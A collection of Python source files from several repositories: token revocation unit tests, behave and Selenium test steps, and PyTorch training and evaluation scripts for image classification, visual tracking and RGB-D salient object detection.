self._assertTokenNotRevoked(token_data_1)
self._assertTokenNotRevoked(token_data_2)
def remove_event(self, event):
self.events.remove(event)
remove_event(self.revoke_events, event)
def test_by_project_and_user_and_role(self):
user_id1 = uuid.uuid4().hex
user_id2 = uuid.uuid4().hex
project_id = uuid.uuid4().hex
self.events.append(self._revoke_by_user(user_id1))
self.events.append(
self._revoke_by_user_and_project(user_id2, project_id))
token_data = _sample_blank_token()
token_data['user_id'] = user_id2
token_data['project_id'] = project_id
self._assertTokenRevoked(token_data)
def test_by_domain_user(self):
# If revoke a domain, then a token for a user in the domain is revoked
user_id = uuid.uuid4().hex
domain_id = uuid.uuid4().hex
token_data = _sample_blank_token()
token_data['user_id'] = user_id
token_data['identity_domain_id'] = domain_id
self._revoke_by_domain(domain_id)
self._assertTokenRevoked(token_data)
def test_by_domain_project(self):
# If revoke a domain, then a token scoped to a project in the domain
# is revoked.
user_id = uuid.uuid4().hex
user_domain_id = uuid.uuid4().hex
project_id = uuid.uuid4().hex
project_domain_id = uuid.uuid4().hex
token_data = _sample_blank_token()
token_data['user_id'] = user_id
token_data['identity_domain_id'] = user_domain_id
token_data['project_id'] = project_id
token_data['assignment_domain_id'] = project_domain_id
self._revoke_by_domain(project_domain_id)
self._assertTokenRevoked(token_data)
def test_by_domain_domain(self):
# If revoke a domain, then a token scoped to the domain is revoked.
user_id = uuid.uuid4().hex
user_domain_id = uuid.uuid4().hex
domain_id = uuid.uuid4().hex
token_data = _sample_blank_token()
token_data['user_id'] = user_id
token_data['identity_domain_id'] = user_domain_id
token_data['assignment_domain_id'] = domain_id
self._revoke_by_domain(domain_id)
self._assertTokenRevoked(token_data)
def _assertEmpty(self, collection):
return self.assertEqual(0, len(collection), "collection not empty")
def test_cleanup(self):
events = self.events
self._assertEmpty(self.revoke_events)
for i in range(0, 10):
events.append(
self._revoke_by_project_role_assignment(uuid.uuid4().hex,
uuid.uuid4().hex))
events.append(
self._revoke_by_domain_role_assignment(uuid.uuid4().hex,
uuid.uuid4().hex))
events.append(
self._revoke_by_domain_role_assignment(uuid.uuid4().hex,
uuid.uuid4().hex))
events.append(
self._revoke_by_user_and_project(uuid.uuid4().hex,
uuid.uuid4().hex))
for event in self.events:
remove_event(self.revoke_events, event)
self._assertEmpty(self.revoke_events)
``` |
{
"source": "jiwanski/qabrica",
"score": 3
} |
#### File: features/steps/multiples_of_3_or_5.py
```python
from behave import given, when, then
from ...src import multiples_of_3_or_5
from hamcrest import assert_that, equal_to, greater_than
@given(u'I have a positive "{number}"')
def step_impl(context, number):
context.number = int(number)
assert_that(context.number, greater_than(0))
@when(u'I find sum of all multiples of 3 or 5 below "{number}"')
def step_impl(context, number):
context.number = int(number)
context.result = multiples_of_3_or_5.solution(context.number)
@then(u'The result should be equal to "{result}"')
def step_impl(context, result):
assert_that(context.result, equal_to(int(result)))
```
#### File: python_pytest/test/conftest.py
```python
import pytest
from selenium import webdriver
@pytest.fixture(scope="class")
def setup(request):
driver = webdriver.Firefox()
driver.get("http://www.wordpress.org")
request.cls.driver = driver
yield driver
driver.close()
```
#### File: python_pytest/test/test_title_with_html_entity.py
```python
import pytest
@pytest.mark.usefixtures("setup")
class Test:
def test_verify_title(self):
title_actual = self.driver.title.encode('ascii', 'xmlcharrefreplace')
title_expected = 'Blog Tool, Publishing Platform, and CMS — WordPress'
assert title_expected == title_actual
``` |
{
"source": "jiweeo/pytorch-stochastic-depth",
"score": 2
} |
#### File: jiweeo/pytorch-stochastic-depth/train.py
```python
import os
import torch
import torch.nn as nn
import torch.utils.data as D
import tqdm
import torch.optim as optim
import torch.backends.cudnn as cudnn
import argparse
from models import resnet, base
import numpy as np
import tensorboard_logger
import torchvision.transforms as transforms
import torchvision.datasets as datasets
cudnn.benchmark = True
parser = argparse.ArgumentParser(description='Dynamic ResNet Training')
parser.add_argument('--lr', type=float, default=.1, help='learning rate')
parser.add_argument('--batch_size', type=int, default=128, help='batch size')
parser.add_argument('--max_epochs', type=int, default=500, help='total epochs to run')
parser.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint')
args = parser.parse_args()
device = 'cuda' if torch.cuda.is_available() else 'cpu'
num_devices = torch.cuda.device_count()
def train(epoch):
rnet.train()
total = 0
correct = 0
train_loss = 0
total_batch = 0
for batch_idx, (inputs, targets) in tqdm.tqdm(enumerate(trainloader), total=len(trainloader)):
inputs, targets = inputs.to(device), targets.to(device)
probs = rnet(inputs, True)
optimizer.zero_grad()
loss = criterion(probs, targets)
loss.backward()
optimizer.step()
train_loss += loss.item()
_, predicted = probs.max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
total_batch += 1
print('E:%d Train Loss: %.3f Train Acc: %.3f LR %f'
% (epoch,
train_loss / total_batch,
correct / total,
optimizer.param_groups[0]['lr']))
tensorboard_logger.log_value('train_acc', correct/total, epoch)
tensorboard_logger.log_value('train_loss', train_loss / total_batch, epoch)
def test(epoch):
global best_test_acc
rnet.eval()
total = 0
correct = 0
test_loss = 0
total_batch = 0
for batch_idx, (inputs, targets) in tqdm.tqdm(enumerate(testloader), total=len(testloader)):
inputs, targets = inputs.to(device), targets.to(device)
probs = rnet(inputs)
loss = criterion(probs, targets)
test_loss += loss.item()
_, predicted = probs.max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
total_batch += 1
print('E:%d Test Loss: %.3f Test Acc: %.3f'
% (epoch, test_loss / total_batch, correct / total))
# save best model
acc = 100.*correct/total
if acc > best_test_acc:
best_test_acc = acc
print('saving best model...')
state = {
'net': rnet.state_dict(),
'acc': acc,
'epoch': epoch,
}
torch.save(state, 'resnet110.t7')
tensorboard_logger.log_value('test_acc', acc, epoch)
tensorboard_logger.log_value('test_loss', test_loss/total_batch, epoch)
def adjust_learning_rate(epoch, stage=[250, 375]):
order = np.sum(epoch >= np.array(stage))
lr = args.lr * (0.1 ** order)
for param_group in optimizer.param_groups:
param_group['lr'] = lr
def get_transforms():
train_tf = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
test_tf = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
return train_tf, test_tf
# dataset and dataloader
train_tf, test_tf = get_transforms()
trainset = datasets.CIFAR10(root='./data', train=True, download=True, transform=train_tf)
testset = datasets.CIFAR10(root='./data', train=False, download=True, transform=test_tf)
trainloader = D.DataLoader(trainset, batch_size=args.batch_size, shuffle=True, num_workers=4, pin_memory=True)
testloader = D.DataLoader(testset, batch_size=args.batch_size, shuffle=False, num_workers=4, pin_memory=True)
best_test_acc = 0.0
# resnet110
num_layers = 54
rnet = resnet.FlatResNet32(base.BasicBlock, [18, 18, 18], num_classes=10)
rnet.to(device)
if num_devices > 1:
print('paralleling for multiple GPUs...')
rnet = nn.DataParallel(rnet)
start_epoch = 0
if args.resume:
assert os.path.isfile('resnet110.t7'), 'Error: no check-point found!'
ckpt = torch.load('resnet110.t7')
rnet.load_state_dict(ckpt['net'])
best_test_acc = ckpt['acc']
start_epoch = ckpt['epoch']
else:
# He's init
for module in rnet.modules():
if isinstance(module, nn.Conv2d):
nn.init.kaiming_normal_(module.weight, mode='fan_out', nonlinearity='relu')
# Loss Fn and Optimizer
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(rnet.parameters(), lr=args.lr, momentum=0.9, weight_decay=1e-4)
# logger
tensorboard_logger.configure('./log/run1')
for epoch in range(start_epoch+1, args.max_epochs):
train(epoch)
test(epoch)
adjust_learning_rate(epoch)
``` |
{
"source": "jiweeo/RL-Tracking",
"score": 2
} |
#### File: RL-Tracking/pytorch/OTB-test.py
```python
from test import test
from utils import get_transform
from train import Reinforce
from environment import Env
import os
import numpy as np
import torch
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
def main():
transform = get_transform()
R = Reinforce(None, transforms=transform)
env = Env()
data_root = '../data/OTB100'
model_root = '../cv/run2/latest.pth'
# load weights
if os.path.isfile(model_root):
print("=> loading checkpoint '{}'".format(model_root))
checkpoint = torch.load(model_root)
R.agent.load_state_dict(checkpoint['state_dict'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(model_root, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(model_root))
test_list = os.listdir(data_root)
for i, filename in enumerate(test_list):
print('[%d/%d] testing %s' % (i, len(test_list), filename))
predicted_bbox = test(env, R, os.path.join(data_root, filename), data_name='otb')
predicted_bbox = np.vstack(predicted_bbox)
np.savetxt(os.path.join(data_root, filename, 'pred_rect_sl.txt'), predicted_bbox, fmt='%.3f')
if __name__ == '__main__':
main()
```
#### File: RL-Tracking/pytorch/train_sl.py
```python
import argparse
import Dataset
from utils import AverageMeter, get_transform
from torch.utils.data import DataLoader
import Network
import torch
import time
from torch.nn import functional as F
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '1'
def parse_arguments():
parser = argparse.ArgumentParser()
parser.add_argument('--max_epochs', type=int, default=5000)
parser.add_argument('--batch_size', type=int, default=64)
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gamma', type=float, default=0.9)
parser.add_argument('--save_freq', type=int, default=5000)
parser.add_argument('--train_data', type=str, default='../data/train/')
parser.add_argument('--num_workers', type=int, default=8)
parser.add_argument('--test_data', type=str, default='../data/test/')
parser.add_argument('--test_freq', type=int, default=5)
parser.add_argument('--resume', type=str, default='', help='path to checkpoint (default: none)')
parser.add_argument('--load', type=str, default='', help='path to checkpoint(default: none)')
parser.add_argument('--log_freq', type=int, default=10)
parser.add_argument('--name', type=str, default='run')
return parser.parse_args()
def train(epoch, net, optimzer, train_loader):
# setting metrics
end = time.time()
batch_time = AverageMeter()
data_time = AverageMeter()
cls_losses = AverageMeter()
action_losses = AverageMeter()
action_accs = AverageMeter()
cls_accs = AverageMeter()
weight = torch.Tensor([1, 1]).cuda()
net.train()
for i, (input, target_action, target_cls) in enumerate(train_loader):
data_time.update(time.time() - end)
input, target_cls, target_action = input.cuda(), target_cls.cuda(), target_action.cuda()
# run model
action, cls = net(input)
# cal loss
action_loss = F.cross_entropy(action, target_action)
cls_loss = F.cross_entropy(cls, target_cls, weight=weight)
action_losses.update(action_loss)
cls_losses.update(cls_loss)
loss = action_loss * 5 + cls_loss
# update net
optimzer.zero_grad()
loss.backward()
optimzer.step()
# cal acc
action = torch.argmax(action, 1)
cls = torch.argmax(cls, 1)
correct_action = (action == target_action).cpu().sum()
correct_cls = (cls == target_cls).cpu().sum()
action_acc = float(correct_action) / input.shape[0]
cls_acc = float(correct_cls) / input.shape[0]
action_accs.update(action_acc)
cls_accs.update(cls_acc)
batch_time.update(time.time()-end)
end = time.time()
if i % args.log_freq == 0:
if i % args.log_freq == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Action_Loss {action_loss.val:.4f} ({action_loss.avg:.4f})\t'
'Class_Loss {cls_loss.val:.4f} ({cls_loss.avg:.4f})\t'
'action_acc {action_acc.val:.4f} ({action_acc.avg:.4f})\t'
'cls_acc {cls_acc.val:.4f} ({cls_acc.avg:.4f})'.format(
epoch, i, len(train_loader), batch_time=batch_time,
action_loss=action_losses, cls_loss=cls_losses,
action_acc=action_accs, cls_acc=cls_accs))
def test(epoch, net, test_loader):
end = time.time()
batch_time = AverageMeter()
action_accs = AverageMeter()
cls_accs = AverageMeter()
net.eval()
for i, (input, target_action, target_cls) in enumerate(test_loader):
input, target_cls, target_action = input.cuda(), target_cls.cuda(), target_action.cuda()
# run model
action, cls = net(input)
# cal acc
action = torch.argmax(action, 1)
cls = torch.argmax(cls, 1)
correct_action = (action == target_action).cpu().sum()
correct_cls = (cls == target_cls).cpu().sum()
action_acc = float(correct_action) / input.shape[0]
cls_acc = float(correct_cls) / input.shape[0]
action_accs.update(action_acc)
cls_accs.update(cls_acc)
batch_time.update(time.time()-end)
end = time.time()
if i % args.log_freq == 0:
if i % args.log_freq == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'action_acc {action_acc.val:.4f} ({action_acc.avg:.4f})\t'
'cls_acc {cls_acc.val:.4f} ({cls_acc.avg:.4f})'.format(
epoch, i, len(test_loader), batch_time=batch_time,
action_acc=action_accs, cls_acc=cls_accs))
return action_accs.avg
def save_checkpoint(state, is_best):
directory = "cv/%s/"%(args.name)
if not os.path.exists(directory):
os.makedirs(directory)
filename = os.path.join(directory, 'epoch-{}.pth'.format(state['epoch']))
torch.save(state, directory + 'latest.pth')
if state['epoch'] % 10 == 0:
torch.save(state, filename)
if is_best:
torch.save(state, directory + 'model_best.pth')
def main():
global args
global best_acc
best_acc = 0
args = parse_arguments()
transfrom = get_transform()
train_dataset = Dataset.TrackData_SL(args.train_data, transfrom)
test_dataset = Dataset.TrackData_SL(args.test_data, transfrom)
train_loader = DataLoader(train_dataset, num_workers=args.num_workers, shuffle=True, batch_size=args.batch_size)
test_loader = DataLoader(test_dataset, num_workers=args.num_workers, shuffle=False, batch_size=args.batch_size)
net = Network.Tracknet()
net.cuda()
optimizer = torch.optim.Adam(net.parameters(), args.lr)
start_epoch = 0
if args.resume:
if args.resume:
ckpt = torch.load(args.resume)
net.load_state_dict(ckpt['state_dict'])
optimizer.load_state_dict(ckpt['optimizer'])
best_acc = ckpt['best_accuracy']
start_epoch = ckpt['epoch']
for e in range(start_epoch, args.max_epochs):
train(e, net, optimizer, train_loader)
if e % args.test_freq == 0:
acc = test(e, net, test_loader)
is_best = acc > best_acc
best_acc = max(best_acc, acc)
# save model
save_checkpoint({
'epoch': e + 1,
'state_dict': net.state_dict(),
'best_accuracy': best_acc,
'optimizer': optimizer.state_dict()
}, is_best)
if __name__ == '__main__':
main()
``` |
{
"source": "jiwei0921/DCF",
"score": 2
} |
#### File: DCF/DCF_code/demo_test.py
```python
import torch
import torch.nn.functional as F
import numpy as np
import pdb, os, argparse
from skimage import io
from tqdm import trange
from model.DCF_models import DCF_VGG
from model.DCF_ResNet_models import DCF_ResNet
from model.fusion import fusion
from evaluateSOD.main import evalateSOD
from data import test_dataset
from model.depth_calibration_models import discriminator, depth_estimator
def eval_data(dataset_path, test_datasets, ckpt_name):
parser = argparse.ArgumentParser()
parser.add_argument('--testsize', type=int, default=352, help='testing size')
parser.add_argument('--is_ResNet', type=bool, default=True, help='VGG or ResNet backbone')
parser.add_argument('--snapshot', type=str, default=ckpt_name, help='checkpoint name')
cfg = parser.parse_args()
if cfg.is_ResNet:
model_rgb = DCF_ResNet()
model_depth = DCF_ResNet()
model = fusion()
model_discriminator = discriminator(n_class=2)
model_estimator = depth_estimator()
model_rgb.load_state_dict(torch.load('./ckpt/DCF_Resnet/'+'DCF_rgb.pth' +cfg.snapshot))
model_depth.load_state_dict(torch.load('./ckpt/DCF_Resnet/' +'DCF_depth.pth' + cfg.snapshot))
model.load_state_dict(torch.load('./ckpt/DCF_Resnet/' + 'DCF.pth' +cfg.snapshot))
model_discriminator.load_state_dict(torch.load('./ckpt/DCF_Resnet/' + 'DCF_dis.pth' + cfg.snapshot))
model_estimator.load_state_dict(torch.load('./ckpt/DCF_Resnet/' + 'DCF_estimator.pth' + cfg.snapshot))
else:
model_rgb = DCF_VGG()
model_depth = DCF_VGG()
model = fusion()
model_discriminator = discriminator(n_class=2)
model_estimator = depth_estimator()
model_rgb.load_state_dict(torch.load('./ckpt/DCF_VGG/'+'DCF_rgb.pth' +cfg.snapshot))
model_depth.load_state_dict(torch.load('./ckpt/DCF_VGG/' + 'DCF_depth.pth' +cfg.snapshot))
model.load_state_dict(torch.load('./ckpt/DCF_VGG/' +'DCF.pth' + cfg.snapshot))
model_discriminator.load_state_dict(torch.load('./ckpt/DCF_VGG/' + 'DCF_dis.pth' + cfg.snapshot))
model_estimator.load_state_dict(torch.load('./ckpt/DCF_Resnet/' + 'DCF_estimator.pth' + cfg.snapshot))
cuda = torch.cuda.is_available()
if cuda:
model_rgb.cuda()
model_depth.cuda()
model.cuda()
model_discriminator.cuda()
model_estimator.cuda()
model_rgb.eval()
model_depth.eval()
model.eval()
model_estimator.eval()
model_discriminator.eval()
for dataset in test_datasets:
if cfg.is_ResNet:
save_path = './results/ResNet50/' + dataset + '/'
else:
save_path = './results/VGG16/' + dataset + '/'
if not os.path.exists(save_path):
os.makedirs(save_path)
image_root = dataset_path + dataset + '/test_images/'
gt_root = dataset_path + dataset + '/test_masks/'
depth_root = dataset_path + dataset + '/test_depth/'
test_loader = test_dataset(image_root, gt_root, depth_root, cfg.testsize)
print('Evaluating dataset: %s' %(dataset))
'''~~~ YOUR FRAMEWORK~~~'''
for i in trange(test_loader.size):
image, gt, depth, name = test_loader.load_data()
if cuda:
image = image.cuda()
depth = depth.cuda()
# RGB Stream
_, res_r,x3_r,x4_r,x5_r = model_rgb(image)
# depth calibration
score= model_discriminator(depth)
score = torch.softmax(score,dim=1)
x3_, x4_, x5_ = x3_r.detach(), x4_r.detach(), x5_r.detach()
pred_depth = model_estimator(image,x3_, x4_, x5_)
depth_calibrated = torch.mul(depth, score[:, 0].unsqueeze(-1).unsqueeze(-1).unsqueeze(-1).
expand(-1, 1, cfg.testsize, cfg.testsize)) \
+ torch.mul(pred_depth, score[:, 1].unsqueeze(-1).unsqueeze(-1).unsqueeze(-1).
expand(-1, 1, cfg.testsize, cfg.testsize))
depth_calibrated = torch.cat([depth_calibrated, depth_calibrated, depth_calibrated], dim=1)
# Depth Stream
_, res_d,x3_d,x4_d,x5_d = model_depth(depth_calibrated)
# Fusion Stream (CRM)
_,res,_,_,_ = model(x3_r,x4_r,x5_r,x3_d,x4_d,x5_d)
res = res+res_d+res_r
res = res.sigmoid().data.cpu().numpy().squeeze()
res = (res - res.min()) / (res.max() - res.min() + 1e-8)
io.imsave(save_path+name, np.uint8(res * 255))
_ = evalateSOD(save_path, gt_root, dataset,ckpt_name)
return
if __name__ == '__main__':
dataset_path = '/Data/test_data/'
test_datasets=['LFSD']
# test_datasets = ['NJU2K', 'NLPR', 'SIP', 'LFSD', 'DES','SSD','DUT','STERE']
ckpt_name = '.85'
eval_data(dataset_path,test_datasets,ckpt_name)
```
#### File: DCF_code/model/DCF_models.py
```python
import torch
import torch.nn as nn
from model.HolisticAttention import HA
from model.vgg import B2_VGG
class RFB(nn.Module):
def __init__(self, in_channel, out_channel):
super(RFB, self).__init__()
self.relu = nn.ReLU(True)
self.branch0 = nn.Sequential(
nn.Conv2d(in_channel, out_channel, 1),
)
self.branch1 = nn.Sequential(
nn.Conv2d(in_channel, out_channel, 1),
nn.Conv2d(out_channel, out_channel, kernel_size=(1, 3), padding=(0, 1)),
nn.Conv2d(out_channel, out_channel, kernel_size=(3, 1), padding=(1, 0)),
nn.Conv2d(out_channel, out_channel, 3, padding=3, dilation=3)
)
self.branch2 = nn.Sequential(
nn.Conv2d(in_channel, out_channel, 1),
nn.Conv2d(out_channel, out_channel, kernel_size=(1, 5), padding=(0, 2)),
nn.Conv2d(out_channel, out_channel, kernel_size=(5, 1), padding=(2, 0)),
nn.Conv2d(out_channel, out_channel, 3, padding=5, dilation=5)
)
self.branch3 = nn.Sequential(
nn.Conv2d(in_channel, out_channel, 1),
nn.Conv2d(out_channel, out_channel, kernel_size=(1, 7), padding=(0, 3)),
nn.Conv2d(out_channel, out_channel, kernel_size=(7, 1), padding=(3, 0)),
nn.Conv2d(out_channel, out_channel, 3, padding=7, dilation=7)
)
self.conv_cat = nn.Conv2d(4*out_channel, out_channel, 3, padding=1)
self.conv_res = nn.Conv2d(in_channel, out_channel, 1)
for m in self.modules():
if isinstance(m, nn.Conv2d):
m.weight.data.normal_(std=0.01)
m.bias.data.fill_(0)
def forward(self, x):
x0 = self.branch0(x)
x1 = self.branch1(x)
x2 = self.branch2(x)
x3 = self.branch3(x)
x_cat = torch.cat((x0, x1, x2, x3), 1)
x_cat = self.conv_cat(x_cat)
x = self.relu(x_cat + self.conv_res(x))
return x
class aggregation(nn.Module):
def __init__(self, channel):
super(aggregation, self).__init__()
self.relu = nn.ReLU(True)
self.upsample = nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True)
self.conv_upsample1 = nn.Conv2d(channel, channel, 3, padding=1)
self.conv_upsample2 = nn.Conv2d(channel, channel, 3, padding=1)
self.conv_upsample3 = nn.Conv2d(channel, channel, 3, padding=1)
self.conv_upsample4 = nn.Conv2d(channel, channel, 3, padding=1)
self.conv_upsample5 = nn.Conv2d(2*channel, 2*channel, 3, padding=1)
self.conv_concat2 = nn.Conv2d(2*channel, 2*channel, 3, padding=1)
self.conv_concat3 = nn.Conv2d(3*channel, 3*channel, 3, padding=1)
self.conv4 = nn.Conv2d(3*channel, 3*channel, 3, padding=1)
self.conv5 = nn.Conv2d(3*channel, 1, 1)
for m in self.modules():
if isinstance(m, nn.Conv2d):
m.weight.data.normal_(std=0.01)
m.bias.data.fill_(0)
def forward(self, x1, x2, x3):
# x1: 1/16 x2: 1/8 x3: 1/4
x1_1 = x1
x2_1 = self.conv_upsample1(self.upsample(x1)) * x2
x3_1 = self.conv_upsample2(self.upsample(self.upsample(x1))) \
* self.conv_upsample3(self.upsample(x2)) * x3
x2_2 = torch.cat((x2_1, self.conv_upsample4(self.upsample(x1_1))), 1)
x2_2 = self.conv_concat2(x2_2)
x3_2 = torch.cat((x3_1, self.conv_upsample5(self.upsample(x2_2))), 1)
x3_2 = self.conv_concat3(x3_2)
x = self.conv4(x3_2)
x = self.conv5(x)
return x
class DCF_VGG(nn.Module):
def __init__(self, channel=32):
super(DCF_VGG, self).__init__()
self.vgg = B2_VGG()
self.rfb3_1 = RFB(256, channel)
self.rfb4_1 = RFB(512, channel)
self.rfb5_1 = RFB(512, channel)
self.agg1 = aggregation(channel)
self.rfb3_2 = RFB(256, channel)
self.rfb4_2 = RFB(512, channel)
self.rfb5_2 = RFB(512, channel)
self.agg2 = aggregation(channel)
self.HA = HA()
self.upsample = nn.Upsample(scale_factor=4, mode='bilinear', align_corners=False)
def forward(self, x):
x1 = self.vgg.conv1(x)
x2 = self.vgg.conv2(x1)
x3 = self.vgg.conv3(x2)
x3_1 = x3
x4_1 = self.vgg.conv4_1(x3_1)
x5_1 = self.vgg.conv5_1(x4_1)
x3_1 = self.rfb3_1(x3_1)
x4_1 = self.rfb4_1(x4_1)
x5_1 = self.rfb5_1(x5_1)
attention = self.agg1(x5_1, x4_1, x3_1)
x3_2 = self.HA(attention.sigmoid(), x3)
x4_2 = self.vgg.conv4_2(x3_2)
x5_2 = self.vgg.conv5_2(x4_2)
x3_2 = self.rfb3_2(x3_2)
x4_2 = self.rfb4_2(x4_2)
x5_2 = self.rfb5_2(x5_2)
detection = self.agg2(x5_2, x4_2, x3_2)
#return self.upsample(attention), self.upsample(detection)
return self.upsample(attention), self.upsample(detection),x3_2,x4_2,x5_2
``` |
{
"source": "jiwei0921/DMRA",
"score": 3
} |
#### File: jiwei0921/DMRA/dataset_loader.py
```python
import os
import numpy as np
import PIL.Image
import scipy.io as sio
import torch
from torch.utils import data
import cv2
class MyData(data.Dataset): # inherit
"""
load data in a folder
"""
mean_rgb = np.array([0.447, 0.407, 0.386])
std_rgb = np.array([0.244, 0.250, 0.253])
def __init__(self, root, transform=False):
super(MyData, self).__init__()
self.root = root
self._transform = transform
img_root = os.path.join(self.root, 'train_images')
lbl_root = os.path.join(self.root, 'train_masks')
depth_root = os.path.join(self.root, 'train_depth')
file_names = os.listdir(img_root)
self.img_names = []
self.lbl_names = []
self.depth_names = []
for i, name in enumerate(file_names):
if not name.endswith('.jpg'):
continue
self.lbl_names.append(
os.path.join(lbl_root, name[:-4]+'.png')
)
self.img_names.append(
os.path.join(img_root, name)
)
self.depth_names.append(
os.path.join(depth_root, name[:-4]+'.png')
)
def __len__(self):
return len(self.img_names)
def __getitem__(self, index):
# load image
img_file = self.img_names[index]
img = PIL.Image.open(img_file)
img = np.array(img, dtype=np.uint8)
img = cv2.resize(img, (256, 256), interpolation=cv2.INTER_AREA)
# load label
lbl_file = self.lbl_names[index]
lbl = PIL.Image.open(lbl_file).convert('L')
lbl = np.array(lbl, dtype=np.int32)
lbl = cv2.resize(lbl, (256, 256), interpolation=cv2.INTER_AREA)
lbl[lbl != 0] = 1
# load depth
depth_file = self.depth_names[index]
depth = PIL.Image.open(depth_file).convert('L')
depth = np.array(depth, dtype=np.uint8)
depth = cv2.resize(depth, (256, 256), interpolation=cv2.INTER_AREA)
if self._transform:
return self.transform(img, lbl, depth)
else:
return img, lbl, depth
# Translating numpy_array into format that pytorch can use on Code.
def transform(self, img, lbl, depth):
img = img.astype(np.float64)/255.0
img -= self.mean_rgb
img /= self.std_rgb
img = img.transpose(2, 0, 1) # to verify
img = torch.from_numpy(img).float()
lbl = torch.from_numpy(lbl).long()
depth = depth.astype(np.float64)/255.0
depth = torch.from_numpy(depth).float()
return img, lbl, depth
class MyTestData(data.Dataset):
"""
load data in a folder
"""
mean_rgb = np.array([0.447, 0.407, 0.386])
std_rgb = np.array([0.244, 0.250, 0.253])
def __init__(self, root, transform=False):
super(MyTestData, self).__init__()
self.root = root
self._transform = transform
img_root = os.path.join(self.root, 'test_images')
depth_root = os.path.join(self.root, 'test_depth')
file_names = os.listdir(img_root)
self.img_names = []
self.names = []
self.depth_names = []
for i, name in enumerate(file_names):
if not name.endswith('.jpg'):
continue
self.img_names.append(
os.path.join(img_root, name)
)
self.names.append(name[:-4])
self.depth_names.append(
# os.path.join(depth_root, name[:-4]+'_depth.png') # Test RGBD135 dataset
os.path.join(depth_root, name[:-4] + '.png')
)
def __len__(self):
return len(self.img_names)
def __getitem__(self, index):
# load image
img_file = self.img_names[index]
img = PIL.Image.open(img_file)
img_size = img.size
img = np.array(img, dtype=np.uint8)
img = cv2.resize(img, (256, 256), interpolation=cv2.INTER_AREA)
# load focal
depth_file = self.depth_names[index]
depth = PIL.Image.open(depth_file).convert('L')
depth = np.array(depth, dtype=np.uint8)
depth = cv2.resize(depth, (256, 256), interpolation=cv2.INTER_AREA)
if self._transform:
img, focal = self.transform(img, depth)
return img, focal, self.names[index], img_size
else:
return img, depth, self.names[index], img_size
def transform(self, img, depth):
img = img.astype(np.float64)/255.0
img -= self.mean_rgb
img /= self.std_rgb
img = img.transpose(2, 0, 1)
img = torch.from_numpy(img).float()
depth = depth.astype(np.float64)/255.0
depth = torch.from_numpy(depth).float()
return img, depth
``` |
{
"source": "jiwei0921/DSU",
"score": 2
} |
#### File: DSU/DSU_Code/DSU_train.py
```python
import torch
import torch.nn.functional as F
from torch.autograd import Variable
import numpy as np
import pdb, os, argparse
from tqdm import tqdm
from datetime import datetime
from model.CPD_ResNet_models import CPD_ResNet
from model.Sal_CNN import Sal_CNN
from data import get_loader
from utils import clip_gradient, adjust_lr
from DSU_test import eval_data
from tensorboardX import SummaryWriter
import torch.backends.cudnn as cudnn
from attentive_training import loss_weight, update_pseudoLabel, ContrastiveLoss
cudnn.benchmark = True
writer = SummaryWriter()
parser = argparse.ArgumentParser()
parser.add_argument('--ckpt_load', type=bool, default=False, help='whether load checkpoint or not')
parser.add_argument('--snapshot', type=int, default=None, help='load checkpoint number')
parser.add_argument('--epoch', type=int, default=40, help='epoch number')
parser.add_argument('--lr', type=float, default=1e-4, help='learning rate')
parser.add_argument('--batchsize', type=int, default=10, help='training batch size')
parser.add_argument('--trainsize', type=int, default=352, help='training dataset size')
parser.add_argument('--clip', type=float, default=0.5, help='gradient clipping margin')
parser.add_argument('--decay_rate', type=float, default=0.1, help='decay rate of learning rate')
parser.add_argument('--decay_epoch', type=int, default=200, help='every n epochs decay learning rate')
opt = parser.parse_args()
image_root = '../Dataset/train_data/images/'
depth_root = '../Dataset/train_data/depth/'
gt_root = '../Dataset/train_data/fake_mask/'
# GT is generated by CDCP [1] method that does not require any human annotation efforts.
# [1] An Innovative Salient Object Detection using Center-dark Channel Prior, ICCVW, 2017.
val_root = '../Dataset/test_data/'
validation = ['NJUD']
# build models
# Both Saliency and Depth Networks employ the CPD [2] extractor equipped with ResNet-50.
# [2] Cascaded Partial Decoder for Fast and Accurate Salient Object Detection, CVPR, 2019.
model_rgb = CPD_ResNet()
model_depth = CPD_ResNet()
model = Sal_CNN()
if opt.ckpt_load:
model_rgb.load_state_dict(torch.load('./ckpt/' + 'DSU_rgb.pth.' + str(opt.snapshot)))
model_depth.load_state_dict(torch.load('./ckpt/' + 'DSU_depth.pth.' + str(opt.snapshot)))
model.load_state_dict(torch.load('./ckpt/' + 'DSU.pth.' + str(opt.snapshot)))
cuda = torch.cuda.is_available()
if cuda:
model_rgb.cuda()
model_depth.cuda()
model.cuda()
params_rgb = model_rgb.parameters()
params_depth = model_depth.parameters()
params = model.parameters()
optimizer_rgb = torch.optim.Adam(params_rgb, opt.lr)
optimizer_depth = torch.optim.Adam(params_depth, opt.lr)
optimizer = torch.optim.Adam(params, opt.lr)
train_loader = get_loader(image_root, gt_root, depth_root, batchsize=opt.batchsize, trainsize=opt.trainsize)
total_step = len(train_loader)
CE = torch.nn.BCEWithLogitsLoss()
MSE = torch.nn.MSELoss()
Distance = ContrastiveLoss()
def train(train_loader, model_rgb, model_depth, model,
optimizer_rgb, optimizer_depth,optimizer, epoch):
model_rgb.train()
model_depth.train()
model.train()
for i, pack in enumerate(tqdm(train_loader), start=1):
iteration = i + epoch*len(train_loader)
optimizer_rgb.zero_grad()
optimizer_depth.zero_grad()
optimizer.zero_grad()
images, gts, depths,ppath,ori_data = pack
images = Variable(images)
gts = Variable(gts)
depths = Variable(depths)
ori_data = [Variable(i) for i in ori_data]
if cuda:
images = images.cuda()
gts = gts.cuda()
depths = depths.cuda()
